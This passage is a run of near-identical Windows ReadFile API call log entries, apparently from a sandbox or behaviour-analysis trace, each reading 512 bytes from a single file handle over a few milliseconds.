	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.318] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.319] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.320] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.320] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.320] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.320] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.320] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.320] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.320] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.320] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.320] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.320] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.320] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.320] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.320] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.320] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.320] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.320] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.320] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.320] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.320] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.320] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.320] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.321] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
